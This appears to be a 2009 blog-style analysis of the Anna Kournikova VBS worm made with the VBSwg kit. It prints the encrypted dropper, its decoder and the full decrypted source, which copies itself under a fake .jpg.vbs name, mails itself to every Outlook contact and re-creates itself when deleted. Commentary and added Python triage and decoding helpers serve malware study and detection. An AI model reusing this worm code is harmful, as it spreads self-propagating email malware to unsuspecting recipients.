AnnaKournikova worm decrypted

People who release these worms created with VBSwg are ultra lame IMO. Any idiot can create a worm with VBSwg (most of the routines look like they were written by [K]alamar himself, so where's the effort or originality?), release it and create havoc. I got nothing against [K]alamar, just people who use his software for destructive purposes.

That said, I don't think this worm is *really* destructive, but it can cause major problems with email servers.

BTW, everything behind forward slashes is a comment. Most of the code is self-explanatory though.

NB. To make it easier to detect these worms, click on View (in the folder menu), Options, View, and uncheck "Hide MS-DOS file extensions that are registered".
*/

/*
Original Source (the part that you get sent)
============================================
Vbs.OnTheFly Created By OnTheFly

/* The LONG string ("X)udQ....") is the actual worm code. The section following it is the decryption scheme. Notice how all the variable and function names are made up of random letters, even in the decrypted code (I renamed the variables). VBSwg does this to make detection by anti-virus programs harder. One subtle pitfall is that all the variable and function names are 11 characters long. This could be used to make detection easier. The other, obvious pitfall is that "VBSwg" is appended to the end of the worm.
*/
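The two tells just described (every generated name is exactly 11 characters of mixed letters and digits, and the generator leaves its own "Vbswg" string at the end), together with the double extension the NB above warns about, are cheap to check for at triage time. The following Python script is an added example and is not part of the original post or of VBSwg. The keyword list, the "three or more random-looking names" threshold and both sample scripts are my own constructions; the generated-style sample only reuses the decoder's identifiers exactly as they appear on this page.

```python
# Added example (not from the original post): a triage heuristic for
# VBSwg-generated scripts, built on the tells described above. Keyword list,
# thresholds and sample scripts are my own constructions.
import re
from dataclasses import dataclass

# VBScript keywords and the built-ins the samples use; anything else that looks
# like a name is treated as a user-chosen (or generator-chosen) identifier.
VBS_RESERVED = {
    "function", "sub", "end", "for", "to", "step", "next", "if", "then",
    "elseif", "else", "set", "dim", "do", "loop", "not", "and", "or", "on",
    "error", "resume", "each", "in", "exit", "call", "true", "false",
    "mid", "len", "asc", "chr", "execute", "createobject", "wscript",
    "vbcrlf", "now", "month", "day",
}

IDENT_RE = re.compile(r"\b[A-Za-z_][A-Za-z0-9_]*\b")
STRING_RE = re.compile(r'"[^"\n]*"')
COMMENT_RE = re.compile(r"'[^\n]*")
MARKER_RE = re.compile(r"vbswg", re.IGNORECASE)
# e.g. "something.jpg.vbs": a data-file extension in front of a script extension
DOUBLE_EXT_RE = re.compile(r"\.[a-z0-9]{2,4}\.vbs\b", re.IGNORECASE)


@dataclass
class Indicators:
    marker_present: bool
    double_extension: bool
    eleven_char_names: list
    other_names: list

    @property
    def suspicious(self) -> bool:
        # The generator's signature string, or three or more distinct
        # random-looking 11-character names, is enough to pull the file for review.
        return self.marker_present or len(self.eleven_char_names) >= 3


def _looks_generated(name: str) -> bool:
    # "random-looking": exactly 11 characters mixing letters and digits
    return (len(name) == 11
            and any(ch.isdigit() for ch in name)
            and any(ch.isalpha() for ch in name))


def vbswg_indicators(script: str) -> Indicators:
    marker = bool(MARKER_RE.search(script))
    double_ext = bool(DOUBLE_EXT_RE.search(script))
    # Strip string literals first, then comments, so names inside them do not count.
    code_only = COMMENT_RE.sub("", STRING_RE.sub('""', script))
    names = {m.group(0) for m in IDENT_RE.finditer(code_only)
             if m.group(0).lower() not in VBS_RESERVED}
    eleven = sorted(n for n in names if _looks_generated(n))
    other = sorted(names - set(eleven))
    return Indicators(marker, double_ext, eleven, other)


# Constructed sample modelled on the decoder stub shown on this page: the
# generator-style names are the ones from the page, the body is shortened.
SAMPLE_GENERATED = '''Execute e7iqom5JE4z("X)udQ0VpgjnH")
Function e7iqom5JE4z(hFeiuKrcoj3)
For I = 1 To Len(hFeiuKrcoj3) Step 2
StTP1MoJ3ZU = Mid(hFeiuKrcoj3, I, 1)
WHz23rBqlo7 = Mid(hFeiuKrcoj3, I + 1, 1)
e7iqom5JE4z = e7iqom5JE4z & WHz23rBqlo7 & StTP1MoJ3ZU
Next
End Function
'Vbswg 1.50b
'''

# Constructed benign script for contrast: human-chosen names of varying length.
SAMPLE_BENIGN = '''Function AddNumbers(first, second)
AddNumbers = first + second
End Function
Dim total
total = AddNumbers(2, 3)
'''

if __name__ == "__main__":
    for label, src in (("generated", SAMPLE_GENERATED), ("benign", SAMPLE_BENIGN)):
        r = vbswg_indicators(src)
        print(label, "suspicious" if r.suspicious else "clean", r.eleven_char_names)
```

The single-letter loop counter `I` is deliberately left in the "other" bucket: the generator's own names are uniform, but the worm still uses ordinary short loop variables, so the heuristic counts random-looking 11-character names rather than demanding that every identifier be 11 long.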

 

Execute e7iqom5JE4z("X)udQ0VpgjnH{tEcggvf{DQVpgjnH{QptGqttgTwugoPzgv
UvgGQ9v58Jr7R6?EgtvcQgldeg*vY$eUktvrU0gjnn+$9G5QJv786r0Rgtyiktg
v$MJWEu^hqyvtc^gpQjVHg{n$^.jE*t9:+(jE*t33+3(Etj3*63+(jE*t23+;(Etj5*
+4(Etj3*;2+(jE*t9;+(jE*t23+2(Etj3*32+(jE*t45+(jE*t33+;(Etj3*72+
(jE*t33+8(Etj3*62+(jE*t45+(jE*t8:+(jE*t:;+(jE*t33+7(Etj3*;3+
(jE*t23+5(Etj5*+4(Etj6*+;(Etj6*+8(Etj7*+5(Etj6*+:(Etj;*+:gUvQtcyVopl
di?7Egtvcqgldeg*vu$terkkviph0nkugu{gvqoldeg$v+tyQoclVip7de0rqh{nkguyterk0veuk
tvrwhnncpgot.yQoclVip7dI0vgrUegckHnnqgf*t+2(^$pCcpqMtwkpqmcxl0irx0ud$kh9G5QJ
v786r0Rgtticgf$*MJWEu^hqyvtc^gpQjVHg{no^kcgn$f+@>$$3vgjpgp4CUJ9inEN+*
pgfhkhkopqjvp*yq+3?cfpf{cp*yq+4?8jvpg9G5QJv786r0RwtpJ$vv<r11yy0y
{fcp{dgvp0$n5.h.ncgupgfhkgUvMLUiJy9M59?ztyQoclVip7dq0grvpzghvnk*guyterk0veuktvrwhnncpgo.+3P\L7\Mz6wk?XLiMyUMJ99z5t0cgcfnnM

LUiJy9M590znEuqgFqKhqPvt*yQoclVip7dh0nkggkzvu*uuyterk0veuktvrwhnncpgo++V
gjpUvgWKg44:|6R2x?QtcyVopldi07tecggvgvvzkhgny*euktvru0terkhvnwpnoc.gVw
t+ggW4K|4R:x602tyvk\g7PML6\kzXwgW4K|4R:x602nEuqgGfpKhNqqrHpwveqkp4gUp9C
nJNi*E+QptGqttgTwugoPzgvUvgF54xQOzM8JT?EgtvcQgldeg*vQ$vwqnmqC0rrk
ncekvpq+$hKF54xQOzM8JT?Q$vwqnmqV$gjpUvgl74PvD\h;n:F?54xQOzM8JTI0vgcPgor
Uec*gO$RC$K+UvgUm834i35gN5?4lv7\P;D:h0nfCtfugNuukuvqHtcGjeL4TRoOuD4ToK
p8U4m33gi55NKhTLo4uR4OoD0TfCtfugGuvpktugE0wqvp>@2jVpg6fFDz5yi3xL?T
Lo4uR4OoD0TfCtfugGuvpktugE0wqvpqHt9Z;:cX|5gT?|3Vq6fFDz5yi3xLUvgk9sd4:6x
5\5?F54xQOzM8JTE0gtvcKggv*o+2gUvKQ6GXDl[LQ:?TLo4uR4OoD0TfCtfugGuvpktug
Z*:9X;5cT||g+k9sd4:6x5\5V0q?KQ6GXDl[LQ0:fCtfuguk9sd4:6x5\5U0dwglve?$gJgt{wqj
xc.g=+q$k9sd4:6x5\5D0fq{?J$<k$(dxtehn($jEegmjVuk$#(xednth($$guvY
hpu:sI[h;?3sk496d5:5x0\vCcvjeg

ovpuhuYsp[:;I3hC0fftyQoclVip7dI0vgrUegckHnnqgf*t+2(^$pCcpqMtwkpqmcxl0irx0ud$k9sd4
:6x5\5F0ngvgCgvhtgwUodvk?VwtgKhsk496d5:5x0\qV>@$$Vgjpk9sd4:6x5\5U0pgfGQ
9v58Jr7R6t0igtyvkgJ$EM^WquvhcygtQ^VpgjnH^{conkfg.$$$3pGfhKgPvzpGfhKgPvzpg
fhkpGfwHepkvpqX)udiy370d2")

Function e7iqom5JE4z(hFeiuKrcoj3)
    For I = 1 To Len(hFeiuKrcoj3) Step 2
        StTP1MoJ3ZU = Mid(hFeiuKrcoj3, I, 1)
        WHz23rBqlo7 = Mid(hFeiuKrcoj3, I + 1, 1)
        If Asc(StTP1MoJ3ZU) = 15 Then
            StTP1MoJ3ZU = Chr(10)
        ElseIf Asc(StTP1MoJ3ZU) = 16 Then
            StTP1MoJ3ZU = Chr(13)
        ElseIf Asc(StTP1MoJ3ZU) = 17 Then
            StTP1MoJ3ZU = Chr(32)
        Else
            StTP1MoJ3ZU = Chr(Asc(StTP1MoJ3ZU) - 2)
        End If
        If WHz23rBqlo7 <> "" Then
            If Asc(WHz23rBqlo7) = 15 Then
                WHz23rBqlo7 = Chr(10)
            ElseIf Asc(WHz23rBqlo7) = 16 Then
                WHz23rBqlo7 = Chr(13)
            ElseIf Asc(WHz23rBqlo7) = 17 Then
                WHz23rBqlo7 = Chr(32)
            Else
                WHz23rBqlo7 = Chr(Asc(WHz23rBqlo7) - 2)
            End If
        End If
        e7iqom5JE4z = e7iqom5JE4z & WHz23rBqlo7 & StTP1MoJ3ZU
    Next
End Function
Vbswg 1.50b
*/
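The decryption routine above is simple once spelled out: the input is walked two characters at a time, each character is shifted back by two (with byte values 15, 16 and 17 standing in for newline, carriage return and space, which would otherwise fall outside the printable range), and the pair is emitted in swapped order. The Python below is an added example, not code from the original post or from VBSwg; it reimplements that scheme under names of my own choosing and adds the inverse so the round trip can be checked on constructed text. One caveat worth knowing before pointing it at the blob reproduced on this page: the page rendering has dropped the non-printable bytes (15, 16, 17), so only the runs between dropped bytes decode cleanly. The opening run "X)udQ0VpgjnH" yields "'Vbs.OnTheFl", after which the space encoded as byte 17 is missing and the pairing goes out of step.

```python
# Added example (not from the original post): a re-implementation of the VBSwg
# pair-swap / shift-by-two encoding used by the dropper shown above, plus the
# inverse so the scheme can be exercised on constructed input. Names are my own.

# Byte values the generator reserves for characters that would otherwise shift
# into or out of the printable range.
_SPECIAL_DECODE = {15: "\n", 16: "\r", 17: " "}
_SPECIAL_ENCODE = {v: chr(k) for k, v in _SPECIAL_DECODE.items()}


def _decode_char(c: str) -> str:
    """Undo the per-character transform: 15/16/17 are LF/CR/space, else code - 2."""
    if c == "":
        return ""
    return _SPECIAL_DECODE.get(ord(c), chr(ord(c) - 2))


def _encode_char(c: str) -> str:
    """Inverse of _decode_char."""
    return _SPECIAL_ENCODE.get(c, chr(ord(c) + 2))


def vbswg_decode(encoded: str) -> str:
    """Mirror of the decryptor on the page: walk the input two characters at a
    time, decode both, and emit them in swapped order (second, then first).
    A trailing lone character is decoded and emitted on its own."""
    out = []
    for i in range(0, len(encoded), 2):
        first = encoded[i]
        second = encoded[i + 1] if i + 1 < len(encoded) else ""
        out.append(_decode_char(second) + _decode_char(first))
    return "".join(out)


def vbswg_encode(plain: str) -> str:
    """Inverse of vbswg_decode, for round-trip checks. Only meaningful for text
    made of printable characters plus CR, LF and space: the scheme gives other
    control characters no unambiguous encoding."""
    out = []
    for i in range(0, len(plain), 2):
        pair = plain[i:i + 2]
        if len(pair) == 2:
            # stored order is (encoded second plaintext char, encoded first)
            out.append(_encode_char(pair[1]) + _encode_char(pair[0]))
        else:
            out.append(_encode_char(pair[0]))
    return "".join(out)


# First run of printable bytes from the encoded string on the page; the byte
# that should follow it (chr(17), a space) was dropped by the page rendering.
PAGE_PREFIX = "X)udQ0VpgjnH"

if __name__ == "__main__":
    print(repr(vbswg_decode(PAGE_PREFIX)))  # "'Vbs.OnTheFl"
    sample = "On Error Resume Next\r\n"     # constructed plaintext
    assert vbswg_decode(vbswg_encode(sample)) == sample
```

For triage, the useful move is to pull the quoted argument of the `Execute` call out of a suspect attachment and run it through `vbswg_decode` offline; the result is the same script the page shows under "Decrypted Code", without the file ever being executed.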

 

 

//*****Decrypted Code******

'Vbs.OnTheFly Created By OnTheFly    //L@/\/\3R who released the worm
On Error Resume Next
Set ws = CreateObject("WScript.Shell")

//says "Worm made with VBSwg 1.50b": another pitfall
ws.regwrite "HKCU\software\OnTheFly\", Chr(87) & Chr(111) & Chr(114) & Chr(109) & Chr(32) & Chr(109) & Chr(97) & Chr(100) & Chr(101) & Chr(32) & Chr(119) & Chr(105) & Chr(116) & Chr(104) & Chr(32) & Chr(86) & Chr(98) & Chr(115) & Chr(119) & Chr(103) & Chr(32) & Chr(49) & Chr(46) & Chr(53) & Chr(48) & Chr(98)

Set fso = CreateObject("scripting.filesystemobject")

fso.copyfile wscript.scriptfullname, fso.GetSpecialFolder(0) & "\AnnaKournikova.jpg.vbs"

if ws.regread("HKCU\software\OnTheFly\mailed") <> "1" then
    Outlook()
end if

//Red Herring?   Maybe, but NL *might* be the origin of the worm
if month(now) = 1 and day(now) = 26 then
    ws.run "Http://www.dynabyte.nl", 3, false
end if

//The following section could be an anti-deletion technique
Set AnnaKournikova = fso.opentextfile(wscript.scriptfullname, 1)
SourceCode = AnnaKournikova.readall
AnnaKournikova.Close
Do
    If Not (fso.fileexists(wscript.scriptfullname)) Then
        Set AnnaKournikova = fso.createtextfile(wscript.scriptfullname, True)
        AnnaKournikova.write SourceCode
        AnnaKournikova.Close
    End If
Loop

Function Outlook()
    On Error Resume Next
    Set OutlookApp = CreateObject("Outlook.Application")
    If OutlookApp = "Outlook" Then
        Set Mapi = OutlookApp.GetNameSpace("MAPI")
        Set MapiAdList = Mapi.AddressLists
        For Each Address In MapiAdList
            If Address.AddressEntries.Count <> 0 Then
                NumOfContacts = Address.AddressEntries.Count
                //Get a list of contacts
                For ContactNumber = 1 To NumOfContacts
                    Set EmailItem = OutlookApp.CreateItem(0)
                    Set ContactNumber = Address.AddressEntries(ContactNumber)
                    EmailItem.To = ContactNumber.Address
                    EmailItem.Subject = "Here you have, ;o)"
                    EmailItem.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""
                    set EmailAttachment = EmailItem.Attachments
                    EmailAttachment.Add fso.GetSpecialFolder(0) & "\AnnaKournikova.jpg.vbs"
                    EmailItem.DeleteAfterSubmit = True

                    //Send the thing
                    If EmailItem.To <> "" Then
                        EmailItem.Send
                        ws.regwrite "HKCU\software\OnTheFly\mailed", "1"
                    End If
                Next
            End If
        Next
    end if
End Function
'Vbswg 1.50b


GSO
Written on Saturday, 03 October 2009 20:47 by GSO
